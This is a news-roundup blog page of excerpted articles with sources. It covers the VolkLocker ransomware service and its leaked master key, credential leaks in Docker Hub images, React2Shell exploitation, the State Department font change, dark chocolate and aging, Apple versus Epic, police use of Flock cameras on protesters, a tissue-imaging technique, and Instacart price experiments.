First, the bad news: the CyberVolk 2.x (aka VolkLocker) ransomware-as-a-service operation that launched in late summer. It’s run entirely through Telegram, which makes it very easy for affiliates that aren’t that tech savvy to lock files and demand a ransom payment.

CyberVolk’s soldiers can use the platform’s built-in automation to generate payloads, coordinate ransomware attacks, and manage their illicit business operations, conducting everything through Telegram.

But here’s the good news: the ransomware slingers got sloppy when it came time to debug their code and hardcoded the master keys – this same key encrypts all files on a victim’s system – into the executable files. This could allow victims to recover encrypted data without paying the extortion fee, according to SentinelOne senior threat researcher Jim Walter, who detailed the gang’s resurgence and flawed code in a Thursday report.

[…]

“Our analysis reveals an operation struggling with the challenges of expansion: taking one step forward with sophisticated Telegram automation, and one step backward with payloads that retain test artifacts enabling victim self-recovery,” Walter wrote.

[…]

In November, the ransomware operators began advertising standalone RAT and keylogger tools and advertised these pricing models:

  • RaaS (single OS): $800-$1,100 USD
  • RaaS (Linux + Windows): $1,600-$2,200 USD
  • Standalone RAT or Keylogger: $500 USD each

Once the ransomware has been deployed on victims’ systems, it escalates privileges, bypassing Windows User Account Control (UAC) to execute malware with admin-level privileges. It determines which files to encrypt based on exclusion lists for specific paths and extensions that have been configured in the malware’s code, and the ransomware uses AES-256 in GCM mode (Galois/Counter Mode) for file encryption.

But, here’s where the malware developers screwed up: VolkLocker doesn’t dynamically generate encryption keys, but rather hardcodes them as hex strings, and writes a plaintext file with the complete master encryption key in the %TEMP% folder.

The plaintext master key “likely represents a test artifact inadvertently shipped in production builds,” Walter wrote. “CyberVolk operators may be unaware that affiliates are deploying builds with the backupMasterKey() function still embedded.”

This “suggests that the operation is struggling to maintain quality control while aggressively recruiting lesser-skilled affiliates,” he added.

[…]

Source: Russian hackers debut simple ransomware service • The Register

US State Dept to Stop Using Calibri Font, go back to Times New Roman in Anti-DEI Push

Posted on by

Secretary of State Marco Rubio sent a memo on Tuesday ordering everyone at the U.S. State Department to use Times New Roman for all official government documents, according to the New York Times. What’s behind Rubio’s sudden obsession with fonts? The Secretary thinks the current typeface being used, Calibri, is too woke.

Rubio’s memo was titled “Return to Tradition: Times New Roman 14-Point Font Required for All Department Paper,” according to the Times and Reuters, which obtained a copy of the memo.

“To restore decorum and professionalism to the Department’s written work products and abolish yet another wasteful DEIA program, the Department is returning to Times New Roman as its standard typeface,” the cable said.

[…]

You can’t make this up

Source: Marco Rubio Orders State Dept to Stop Using Calibri Font in Anti-DEI Push

Over 10,000 Docker Hub images found leaking credentials, auth keys

Posted on by

More than 10,000 Docker Hub container images expose data that should be protected, including live credentials to production systems, CI/CD databases, or LLM model keys.

The secrets impact a little over 100 organizations, among them are a Fortune 500 company and a major national bank.

[…]

After scanning container images uploaded to Docker Hub in November, security researchers at threat intelligence company Flare found that 10,456 of them exposed one or more keys.

The most frequent secrets were access tokens for various AI models (OpenAI, HuggingFace, Anthropic, Gemini, Groq). In total, the researchers found 4,000 such keys.

When examining the scanned images, the researchers discovered that 42% of them exposed at least five sensitive values.

“These multi-secret exposures represent critical risks, as they often provide full access to cloud environments, Git repositories, CI/CD systems, payment integrations, and other core infrastructure components,” Flare notes in a report today.

[…]

According to the researchers, one of the most frequent errors observed was the use of .ENV files that developers use to store database credentials, cloud access keys, tokens, and various authentication data for a project.

Additionally, they found hardcoded API tokens for AI services being hardcoded in Python application files, config.json files, YAML configs, GitHub tokens, and credentials for multiple internal environments.

Some of the sensitive data was present in the manifest of Docker images, a file that provides details about the image.

Many of the leaks appear to originate from the so-called ‘shadow IT’ accounts, which are Docker Hub accounts that fall outside of the stricter corporate monitoring mechanisms, such as those for personal use or belonging to contractors.

Flare notes that roughly 25% of developers who accidentally exposed secrets on Docker Hub realized the mistake and removed the leaked secret from the container or manifest file within 48 hours.

However, in 75% of these cases, the leaked key was not revoked, meaning that anyone who stole it during the exposure period could still use it later to mount attacks.

Organizations should implement active scanning across the entire software development life cycle and revoke exposed secrets and invalidate old sessions immediately.

Source: Over 10,000 Docker Hub images found leaking credentials, auth keys

Half of exposed React servers remain unpatched amid attacks

Posted on by

Half of the internet-facing systems vulnerable to a fast-moving React remote code execution flaw remain unpatched, even as exploitation has exploded into more than a dozen active attack clusters ranging from bargain-basement cryptominers to state-linked intrusion tooling.

That’s the assessment from Alon Schindel, VP of AI and Threat Research at Wiz, who says CVE-2025-55182 – the React server-side vulnerability dubbed “React2Shell” – is now being actively exploited at scale, with researchers tracking at least 15 distinct intrusion clusters in the wild over the past 24 hours alone.

According to Wiz’s latest telemetry, roughly 50 percent of publicly exposed resources known to be vulnerable are still running unpatched code, giving attackers a comfortable head start.

The critical-severity flaw, first disclosed earlier this month, affects React Server Components and dependent frameworks such as Next.js and stems from unsafe deserialization in React’s server-side packages, allowing an unauthenticated attacker to send a crafted request to achieve remote code execution. As The Register previously reported, the bug quickly proved attractive to attackers because of React’s ubiquity in modern web stacks, particularly in cloud-hosted environments where a single exposed endpoint can provide a foothold into far larger estates.

What began as opportunistic scanning and cryptomining has now broadened into something messier. Wiz says it is seeing a clear split between “commodity” exploitation – dominated by familiar cryptomining operations using tools like Kinsing, C3Pool, and custom loaders – and more deliberate intrusion sets deploying post-exploitation frameworks and bespoke malware.

Among the clusters observed are Python-based campaigns masquerading as miner droppers while quietly exfiltrating secrets, Sliver command-and-control infrastructure used for hands-on-keyboard operations, and a JavaScript file injector that systematically infects every server-side *.js file it can reach. Wiz also reports the re-emergence of EtherRat backdoor variants, a family of malware that had previously fallen out of favor but appears to have been dusted off for this wave of exploitation.

The technical sophistication is also creeping upward. Multiple miscreants are actively attempting to frustrate incident response by manipulating timestamps, minimizing logs, and otherwise scrubbing evidence of compromise. Those anti-forensics techniques, Wiz warned, suggest operators who expect to be hunted and intend to linger.

[…]

Source: Half of exposed React servers remain unpatched amid attacks • The Register

Dark chocolate ingredient associated with lower apparent age

Posted on by

A natural chemical in dark chocolate may play a role in slowing certain signs of biological aging. Researchers at King’s College London have identified theobromine, a plant compound found in cocoa, as a possible contributor to this effect.

The study, published on December 10 in Aging, analyzed how much theobromine was present in participants’ blood and compared those levels with biological aging markers measured in blood samples.

What Biological Age Reveals

Biological age reflects how well a person’s body is functioning, rather than the number of years they have lived. This measure is based on DNA methylation, a collection of tiny chemical tags on DNA that shift as we grow older.

The research team examined data from two European groups, including 509 people from TwinsUK and 1,160 from KORA. Individuals with higher amounts of theobromine in their bloodstream tended to have a biological age that appeared younger than their chronological age.

[…]

Dr. Ricardo Costeira, a Postdoctoral Research Associate at King’s College London, said: “This study identifies another molecular mechanism through which naturally occurring compounds in cocoa may support health. While more research is needed, the findings from this study highlight the value of population-level analyses in aging and genetics.”

Although the findings are encouraging, the researchers caution that increasing dark chocolate consumption is not automatically beneficial. Chocolate also contains sugar, fat and other ingredients, and more work is needed to fully understand how theobromine interacts with the body and how it may influence aging.

Source: Scientists find dark chocolate ingredient that slows aging | ScienceDaily

Apple appeal loses vs Epic again. Google decides to settle with Epic.

Posted on by

Shortly after appeals court judges ruled against Apple’s contempt appeal in a years-long antitrust dispute against the makers of Fortnite, I got to talk to Epic Games CEO Tim Sweeney in an interview. According to Sweeney, today’s ruling “completely shuts down” Apple’s App Store rules that allow it to collect “junk fees.”

The three-judge Ninth Circuit Court of Appeals panel largely affirmed an April ruling that Apple failed to comply with Judge Yvonne Gonzalez Rogers’s 2021 order allowing app developers to link to external payment options, which Sweeney said “… is really awesome for all developers.”

Perhaps the most notable part of the appeals court ruling is that the panel is asking Gonzalez Rogers to look at ways Apple could charge developers reasonable fees for purchases made in apps using outside payment links. In her April ruling, Gonzalez Rogers blocked Apple from taking any fees from external payments because of decisions like slapping external payments with a 27 percent fee and forcing developers to make their payments links in plain text.

But the appeals court says Apple “should” be able to charge a fee based on “the costs that are genuinely and reasonably necessary for its coordination of external links for linked-out purchases, but no more” and that Apple is “entitled to some compensation for the use of its intellectual property that is directly used in permitting Epic and others to consummate linked-out purchases.”

“If you want to have an app go through review with custom linkouts, maybe there’s several hundred dollars of fees associated with that every time you submit an app, which is perfectly reasonable because there are real people at Apple doing those things and Apple pays them, and we should be contributing to that,” Sweeney says. But he says that the ruling, “completely shuts down, I think, for all time, Apple’s theory that they should be able to charge arbitrary junk fees for access.”

With these two areas that Apple would be allowed to charge for, Sweeney says that “I can’t imagine any justification for a percentage of developer revenue being assessed here.”

[…]

The ruling wasn’t the only big news for Epic and Fortnite on mobile today: the game also returned to Google Play in the US after similarly being booted by Google when Epic added the in-app payments system to Fortnite. Epic and Google announced last month that they have agreed to settle their lawsuit, and while the two sides are still seeking court approval for their settlement, it resolves their disputes worldwide.

[…]

Source: Tim Sweeney on the future of Fortnite after another win over Apple | The Verge

How Cops Are Using Flock’s license plate camera Network To Surveil Protesters And Activists

Posted on by

It’s no secret that 2025 has given Americans plenty to protest about. But as news cameras showed protesters filling streets of cities across the country, law enforcement officers—including U.S. Border Patrol agents—were quietly watching those same streets through different lenses: Flock Safety automated license plate readers (ALPRs) that tracked every passing car.

Through an analysis of 10 months of nationwide searches on Flock Safety’s servers, we discovered that more than 50 federal, state, and local agencies ran hundreds of searches through Flock’s national network of surveillance data in connection with protest activity. In some cases, law enforcement specifically targeted known activist groups, demonstrating how mass surveillance technology increasingly threatens our freedom to demonstrate.

Flock Safety provides ALPR technology to thousands of law enforcement agencies. The company installs cameras throughout their jurisdictions, and these cameras photograph every car that passes, documenting the license plate, color, make, model and other distinguishing characteristics. This data is paired with time and location, and uploaded to a massive searchable database. Flock Safety encourages agencies to share the data they collect broadly with other agencies across the country. It is common for an agency to search thousands of networks nationwide even when they don’t have reason to believe a targeted vehicle left the region.

Via public records requests, EFF obtained datasets representing more than 12 million searches logged by more than 3,900 agencies between December 2024 and October 2025. The data shows that agencies logged hundreds of searches related to the 50501 protests in February, the Hands Off protests in April, the No Kings protests in June and October, and other protests in between.

[…]

While EFF and other civil liberties groups argue the law should require a search warrant for such searches, police are simply prompted to enter text into a “reason” field in the Flock Safety system. Usually this is only a few words–or even just one.

In these cases, that word was often just “protest.”

Crime does sometimes occur at protests, whether that’s property damage, pick-pocketing, or clashes between groups on opposite sides of a protest. Some of these searches may have been tied to an actual crime that occurred, even though in most cases officers did not articulate a criminal offense when running the search. But the truth is, the only reason an officer is able to even search for a suspect at a protest is because ALPRs collected data on every single person who attended the protest.

[…]

In a few cases, police were using Flock’s ALPR network to investigate threats made against attendees or incidents where motorists opposed to the protests drove their vehicle into crowds. For example, throughout June 2025, an Arizona Department of Public Safety officer logged three searches for “no kings rock threat,” and a Wichita (Kan.) Police Department officer logged 22 searches for various license plates under the reason “Crime Stoppers Tip of causing harm during protests.”

Even when law enforcement is specifically looking for vehicles engaged in potentially criminal behavior such as threatening protesters, it cannot be ignored that mass surveillance systems work by collecting data on everyone driving to or near a protest—not just those under suspicion.

Border Patrol’s Expanding Reach

As U.S. Border Patrol (USBP), ICE, and other federal agencies tasked with immigration enforcement have massively expanded operations into major cities, advocates for immigrants have responded through organized rallies, rapid-response confrontations, and extended presences at federal facilities.

USBP has made extensive use of Flock Safety’s system for immigration enforcement, but also to target those who object to its tactics. In June, a few days after the No Kings Protest, USBP ran three searches for a vehicle using the descriptor “Portland Riots.”

[…]

Fighting Back Against ALPR

ALPR systems are designed to capture information on every vehicle that passes within view. That means they don’t just capture data on “criminals” but on everyone, all the time—and that includes people engaged in their First Amendment right to publicly dissent. Police are sitting on massive troves of data that can reveal who attended a protest, and this data shows they are not afraid to use it.

Our analysis only includes data where agencies explicitly mentioned protests or related terms in the “reason” field when documenting their search. It’s likely that scores more were conducted under less obvious pretexts and search reasons. According to our analysis, approximately 20 percent of all searches we reviewed listed vague language like “investigation,” “suspect,” and “query” in the reason field. Those terms could well be cover for spying on a protest, an abortion prosecution, or an officer stalking a spouse, and no one would be the wiser–including the agencies whose data was searched. Flock has said it will now require officers to select a specific crime under investigation, but that can and will also be used to obfuscate dubious searches.

For protestors, this data should serve as confirmation that ALPR surveillance has been and will be used to target activities protected by the First Amendment. Depending on your threat model, this means you should think carefully about how you arrive at protests, and explore options such as by biking, walking, carpooling, taking public transportation, or simply parking a little further away from the action. Our Surveillance Self-Defense project has more information on steps you could take to protect your privacy when traveling to and attending a protest.

[…]

Everyone should have the right to speak up against injustice without ending up in a database.

Source: How Cops Are Using Flock Safety’s ALPR Network To Surveil Protesters And Activists | Techdirt

Simple light trick reveals hidden organic pathways in microscopic detail

Posted on by

Every tissue in the human body contains exceptionally small fibers that help coordinate how organs move, function and communicate. Muscle fibers guide physical force, intestinal fibers support the motion of the digestive tract, and brain fibers carry electrical signals that allow different regions to exchange information. Together, these intricate fiber systems help shape the structure of each organ and keep them operating properly.

[…]

Although these microscopic structures play essential roles, they have long been challenging to study. Researchers have struggled to determine how fibers are oriented inside tissues, which has made it difficult to fully understand how they change in health and disease.

A Simple Method for Revealing Hidden Microstructure

A research team led by Marios Georgiadis, PhD, instructor of neuroimaging, has now introduced an approach that makes these hard-to-see fiber patterns visible with exceptional clarity and at a relatively low cost.

Their technique, described in Nature Communications, is known as computational scattered light imaging (ComSLI). It can reveal the orientation and organization of tissue fibers at micrometer resolution on virtually any histology slide, regardless of how it was stained or preserved — even if the slide is many decades old.

[…]

ComSLI relies on a basic physical principle: when light encounters microscopic structures, it scatters in different directions based on their orientation. By rotating the light source and recording how the scattering signal changes, researchers can reconstruct the direction of the fibers within each pixel of an image.

The method requires only a rotating LED light and a microscope camera, making the setup accessible compared with other forms of advanced microscopy. After the images are collected, software analyzes delicate patterns in the scattered light to generate color-coded maps of fiber orientation and density, known as microstructure-informed fiber orientation distributions.

ComSLI is not limited by sample preparation. It works with formalin-fixed, paraffin-embedded sections (a standard in hospitals and pathology labs) as well as fresh-frozen, stained or unstained slides.

[…]

“This is a tool that any lab can use,” Zeineh said. “You don’t need specialized preparation or expensive equipment. What excites me most is that this approach opens the door for anyone, from small research labs to pathology labs, to uncover new insights from slides they already have.”

[…]

To test the limits of the method, the researchers analyzed a brain section prepared in 1904. Even in this century-old sample, ComSLI identified intricate fiber patterns, allowing scientists to study historical specimens and explore how structural features evolve across generations of disease.

Applications Beyond the Brain

Although first designed for brain research, ComSLI also works well in other tissues. The team used it to study muscle, bone and vascular samples, each revealing unique fiber arrangements tied to their biological functions.

In tongue muscle, the method highlighted layered fiber orientations linked to movement and flexibility. In bone, it captured collagen fibers that align with mechanical stress. In arteries, it showed alternating collagen and elastin layers that support both strength and elasticity.

This ability to map fiber orientation across species, organs and archival specimens could significantly change how scientists investigate structure and function.

[…]

Story Source:

Materials provided by Stanford Medicine. Note: Content may be edited for style and length.

Journal Reference:

  1. Marios Georgiadis, Franca auf der Heiden, Hamed Abbasi, Loes Ettema, Jeffrey Nirschl, Hossein Moein Taghavi, Moe Wakatsuki, Andy Liu, William Hai Dang Ho, Mackenzie Carlson, Michail Doukas, Sjors A. Koppes, Stijn Keereweer, Raymond A. Sobel, Kawin Setsompop, Congyu Liao, Katrin Amunts, Markus Axer, Michael Zeineh, Miriam Menzel. Micron-resolution fiber mapping in histology independent of sample preparation. Nature Communications, 2025; 16 (1) DOI: 10.1038/s41467-025-64896-9

Source: Simple light trick reveals hidden brain pathways in microscopic detail | ScienceDaily

Instacart Charging Customers up to 25% Different Prices for Same Products

Posted on by

How much does a carton of eggs cost? Depends on who you are. A new study produced in collaboration with policy group Groundwork Collaborative, Consumer Reports, and More Perfect Union found that people who purchased the exact same product from the exact same store at the exact same time were charged different prices—sometimes up to nearly 25% more—when placing the order on Instacart.

The study tapped 437 volunteer shoppers in four cities who were put in groups that were synced up virtually to add items from a specific grocery store into their Instacart shopping carts at the same time. They then reported the prices that appeared for those researchers to determine if people were being charged different prices for the same goods.

The result was a pretty resounding “Yes.” According to the study, nearly three-quarters of all grocery items tested in the experiment produced multiple prices across shoppers, including some products that showed five different prices for the same product.

[…]

Researchers reported that the final total of the Instacart shopping carts varied by an average of 7% despite every item and condition being identical.

[…]

According to Consumer Reports, the company confirmed the study accurately reflected its pricing strategies, which it claims to only do at 10 partnering grocery retailers that it chose not to name.

[…]

While Instacart didn’t name the retailers they have partnered with for this program, the study did name where they performed their tests. One retailer was Target, and they found varying prices on items sold through Instacart from the retailer. Target told Groundwork Collaborative that it has no business relationship with Instacart and “does not directly share any pricing information with Instacart or dictate what Instacart prices appear on their platform.” Instacart acknowledged to the publication that it scrapes Target’s prices and adds an upcharge to offset “operating and technology costs.” So Target was seemingly not one of the 10 retail partners, but shoppers there were still exposed to price variance. Instacart claims it has ended pricing experiments at Target.

It certainly seems like the pricing discrepancies are an example of surveillance pricing, where consumers are served different prices based on information the platform knows about them. The study didn’t find any clear correlation that would link certain shopper demographic data and the prices they were presented, and Instacart told Consumer Reports that it doesn’t use any personal or demographic data from users in its pricing experiments and instead explained that customers are randomly assigned to price groups.

[…]

“These tests are not dynamic pricing – prices never change in real-time, including in response to supply and demand. The tests are never based on personal or behavioral characteristics — they are completely randomized,” an Instacart spokesperson told Gizmodo.

So Instacart’s varied pricing is allegedly part of an experiment that randomly assigns shoppers to different pricing groups, but brands whose goods are available on Instacart can use the company’s data-driven pricing platform to serve different prices based on different demographic data. For the end user, that likely feels like a distinction without a difference, as they are ultimately seeing different prices based on conditions that are outside of their control.

Source: Instacart Charging Customers Different Prices for Same Products, Study Finds